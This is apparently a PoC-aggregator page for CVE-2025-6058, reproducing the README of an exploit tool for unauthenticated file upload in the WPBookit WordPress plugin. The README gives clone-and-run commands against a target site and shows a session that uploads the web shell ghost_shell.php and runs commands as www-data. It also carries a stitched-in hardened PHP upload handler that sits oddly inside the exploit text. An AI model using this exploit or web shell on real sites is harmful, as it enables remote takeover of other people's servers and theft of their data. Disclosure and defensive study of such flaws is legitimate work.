Related vulnerability
Title:
WordPress plugin WPBookit code issue vulnerability
(CVE-2025-6058)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP; it lets users host a personal blog site on a server running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin WPBookit 1.0.4 and earlier contain a code issue vulnerability: the image_upload_handle function lacks file type validation, which may allow an unauthenticated attacker to upload arbitrary files.
Description
WordPress WPBookit ≤ 1.0.4 Unauthenticated File Upload Exploit
Introduction
<p align="center">
<img src="https://s.w.org/style/images/about/WordPress-logotype-alternative.png" alt="WordPress Logo" width="200">
</p>
<h1 align="center">🚨 CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 Unauthenticated File Upload Exploit</h1>
<p align="center">
<img src="https://img.shields.io/badge/Exploit-Type-File%20Upload-red?style=flat-square">
<img src="https://img.shields.io/badge/Platform-WordPress-blue?style=flat-square">
<img src="https://img.shields.io/badge/Status-Working-brightgreen?style=flat-square">
<img src="https://img.shields.io/github/license/0xgh057r3c0n/CVE-2025-6058?style=flat-square">
</p>
<p align="center">
<b>Unauthenticated Arbitrary File Upload Exploit targeting WordPress WPBookit Plugin (≤ 1.0.4)</b><br>
Exploit allows remote shell upload and full command execution.<br><br>
<a href="https://github.com/0xgh057r3c0n">Author: 0xgh057r3c0n</a>
</p>
---
## 📌 About The Vulnerability
**CVE-2025-6058** is a critical vulnerability affecting the **WPBookit** plugin on WordPress CMS. An unauthenticated attacker can abuse a vulnerable AJAX endpoint to upload arbitrary PHP files, enabling **Remote Code Execution (RCE)**.
- 🎯 **Target**: WordPress CMS (vulnerable WPBookit plugin)
- 📦 **Plugin Affected**: WPBookit ≤ 1.0.4
- ⚠️ **Risk Level**: Critical (Unauthenticated RCE)
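The description above attributes the flaw to an upload handler that performs no file type validation and is reachable without authentication. The following handler is an added, illustrative example of what such a WordPress AJAX upload routine looks like once the missing controls are in place; it is not WPBookit's code, and the hook name `example_image_upload`, the nonce action and the `image` field name are assumptions.

```php
<?php
// Illustrative hardened AJAX image-upload handler for a WordPress plugin.
// Added example, not WPBookit's code; the hook name 'example_image_upload',
// the nonce action and the 'image' form field are assumptions.

// Small allowlist of image types (extension pattern => MIME type).
const EXAMPLE_ALLOWED_IMAGE_MIMES = array(
    'jpg|jpeg' => 'image/jpeg',
    'png'      => 'image/png',
    'gif'      => 'image/gif',
);

function example_image_upload_handle() {
    // 1. Never serve anonymous callers: the handler is registered on wp_ajax_*
    //    only (no wp_ajax_nopriv_* hook) and additionally checks a capability.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 2. CSRF protection: the request must carry a valid nonce.
    check_ajax_referer( 'example_image_upload', 'nonce' );

    if ( empty( $_FILES['image'] ) || ! is_uploaded_file( $_FILES['image']['tmp_name'] ) ) {
        wp_send_json_error( array( 'message' => 'No file uploaded.' ), 400 );
    }
    $file = $_FILES['image'];

    // 3. File type validation against the allowlist. wp_check_filetype_and_ext()
    //    checks the extension and, for images, the actual content; it sets
    //    'proper_filename' when the claimed extension did not match the bytes.
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], EXAMPLE_ALLOWED_IMAGE_MIMES );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) || ! empty( $check['proper_filename'] ) ) {
        wp_send_json_error( array( 'message' => 'Only JPEG, PNG and GIF images are accepted.' ), 415 );
    }

    // 4. Belt and braces: the bytes must decode as an image.
    if ( false === @getimagesize( $file['tmp_name'] ) ) {
        wp_send_json_error( array( 'message' => 'File is not a valid image.' ), 415 );
    }

    // 5. Hand off to the core upload routine with the same allowlist, so the
    //    stored file keeps a safe extension and lands under wp-content/uploads.
    $overrides = array(
        'test_form' => false,
        'mimes'     => EXAMPLE_ALLOWED_IMAGE_MIMES,
    );
    $result = wp_handle_upload( $file, $overrides );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( array( 'message' => $result['error'] ), 400 );
    }

    wp_send_json_success( array( 'url' => esc_url_raw( $result['url'] ) ) );
}

// Authenticated users only; deliberately no wp_ajax_nopriv_ registration.
add_action( 'wp_ajax_example_image_upload', 'example_image_upload_handle' );
```

The two controls that matter for this class of bug are the absence of a `wp_ajax_nopriv_*` registration (so the endpoint is not reachable unauthenticated) and passing an explicit `mimes` allowlist to both `wp_check_filetype_and_ext()` and `wp_handle_upload()`; without the allowlist, WordPress falls back to the site-wide permitted types, and without any check at all a `.php` file is written straight into the web-served uploads directory.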
---
## ✨ Features
- 🔍 Auto-detects WordPress plugin version via `README.txt`
- 📤 Uploads lightweight PHP shell (`ghost_shell.php`)
- 🖥️ Interactive shell (Parrot-style prompt)
- 🌐 Unauthenticated — No login required
- 🎨 Colorized CLI Output
---
## 🚀 Usage Guide
### 💻 Requirements
```bash
python3 --version
pip install requests
```
---
### ⚙️ Exploit Execution
```bash
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com
```
---
## 🛠️ Example Shell Session
```bash
python3 CVE-2025-6058.py -u https://victim.com
[>] Checking plugin version...
[+] Found plugin version: 1.0.4
[!] Target version is vulnerable.
[>] Uploading shell...
[+] Upload successful.
[+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
[!] Interactive GhostShell Started — type 'exit' to quit.
┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data
```
---
## 📂 Shell Details
* **File Name**: `ghost_shell.php`
* **Path**: `/wp-content/uploads/YYYY/MM/ghost_shell.php`
* **Example**:
```
https://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
```
---
## ⚠️ Legal Disclaimer
> This exploit is developed for **educational purposes** and authorized penetration testing only. Unauthorized use against systems without explicit consent is **illegal**.
---
## 📄 License
Released under [MIT License](LICENSE)
---
<p align="center">
Made for WordPress security auditing 🛡️ by <a href="https://github.com/0xgh057r3c0n">0xgh057r3c0n</a>
</p>
File snapshot
[4.0K] /data/pocs/6dfac5f35344c8cec8674dc1939b932a7fd33c42
├── [6.4K] CVE-2025-6058.py
├── [3.2K] CVE-2025-6058.yaml
├── [1.1K] LICENSE
└── [3.0K] README.md
0 directories, 4 files
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.